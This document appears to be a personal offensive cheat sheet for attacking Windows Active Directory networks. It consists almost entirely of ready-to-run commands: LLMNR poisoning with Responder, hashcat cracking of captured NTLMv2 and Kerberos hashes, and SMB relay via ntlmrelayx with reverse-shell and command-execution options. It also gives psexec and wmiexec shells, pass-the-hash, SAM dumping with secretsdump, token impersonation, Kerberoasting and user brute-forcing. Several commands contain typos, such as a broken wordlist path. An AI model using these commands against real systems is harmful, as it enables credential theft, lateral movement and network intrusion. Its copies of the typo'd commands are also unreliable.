
Impacket : https://github.com/SecureAuthCorp/impacket
--------------------------------------------------------
1.Download the source
2.cp imapcket /opt
3.python3 -m pip install .

Using imapcket to connect mssql using creds obtained
------------------------------------------------------------

proxychains impacket-mssqlclient user:pass@IP -windows-auth
-------------------------------------------------------------

LMNR Poisoning
--------------------------------------------------------
> sudo responder -I eth0 -rdwv
OR TRY
> sudo responder -I eth0 -dwv

Cracking Captured HASH
--------------------------------------------------------
1. Identify the Hash
> hashid hash.txt 

2. sudo hashcat -m 5600 hash.txt  .usr/share/wordlist/rocku.txt --force           // 5600 - NTLMv2 hash 

=> cracking kerberos hash
----------------------------------------
#hashcat -m 13100 kerberosHash.txt /usr/share/wordlists/ rockyou.txt --force      //13100 [$krb5tgs$] or 18200 [$krb5asrep$]
----------------------------------------------------------------------------

SMB Relay
--------------------------------------------------------
Use the hash cpatured from the responder to gain access to other machines instead of cracking the hash.Howerver there are two requirements for successfull execution of this attack.
REQ1 --> SMB signing must be disabled on the target machine.
REQ2 --> Relayed user must be admin on the target machine.

1. Identify the hosts with SMB signing disabled.
> nmap --script=smb2-security-mode.nse -p445 <IP/RANGE>            // to identify nmap smb script run `locate *.nse | grep smb`
2. Create text file say targets.txt with the host identified as smb signing disabled / not required.
3. Edit responder.conf file and st below options as
        SMB = Off
        http = Off
        
4. Start responder using below command and ensure that HTTP and SMB is OFF.
        > sudo responder -I eth1 -dwv
5. Set ntlmrelay using below commnad
        > sudo ntlmrelayx.py -tf targets.txt -smb2support
OR
        > sudo ntlmrelayx.py -tf targets.txt -smb2support -i                            // interactive shell and connnect usin netcat
OR
        > sudo ntlmrelayx.py -tf targets.txt -smb2support -e mterprter_rev_shell.exe    // meterpreter reverse shell using multi handler
OR
        >sudo ntlmrelayx.py -tf targets.txt -smb2support -c <command>                  // command execution


Gaining Shell once credentails are obtained
--------------------------------------------------------
1. Use below commands

> psexec.py <DOMAIN.local>/<USER>:<PASS>@<TARGET_IP> 
OR
> Use msf module psexec
OR
> smbexec.py <DOMAIN.local>/<USER>:<PASS>@<TARGET_IP> 
OR
> wmiexec.py <DOMAIN.local>/<USER>:<PASS>@<TARGET_IP> 

Pass the Password
--------------------------------------------------------
>apt install crackmapexec
--------------------------------------------------------
> crackmapexec smb <ip/cidr> -u <user> -d <domain> -p <pass>

Pass the Hash [https://meriemlarouim.medium.com/pass-the-hash-gaining-access-without-cracking-passwords-ce67c267c491]
--------------------------------------------------------
> crackmapexec smb <ip/cidr> -u <user> -H <HASH> --local-auth

Dump Local Hashes (SAM)
--------------------------------------------------------
> secretsdump.py <DOMAIN.local>/<USER>:<PASS>@<TARGET_IP>

Gaining Shell using dumped Hashed password
--------------------------------------------------------
> psexec.py "<user_name>":@<IP> -hashes <HASH_value>

Token Impersonation using Incognito
---------------------------------------------------
1> get meterpreter shell using exploit/windows/smb/psexec
2> meterpreter > load incognito
3> list_tokens -u
4> impersonate_token <DOMAIN>\\<USER>

Usefull refrences
--------------------------------------------------------------------------------
https://wadcoms.github.io/#+Shell+Enumeration+Windows

rev2self

Kerboroasting
---------------------------
GetUserSPNs.py <domain>/username:password -dc-ip <domainIP> -request
OR
python3 GetUserSPNs.py <domain>/username:password -dc-host <full domain> -k -no-pass -request     // if NTLM is disabled


##########################################MISCELANEOUS COMMANDS##################################################

> crackmapexec smb <ip/cidr>
> crackmapexec smb <ip/cidr> --shares
> rpcclients <ip>
> Impacket tool > GetNPUSer.py <domain>/<username>

Bruteforcing | kerbrute
--------------------------------------------------------------------------------
#kerbrute userenum --dc <ip> -d <domain> user.txt




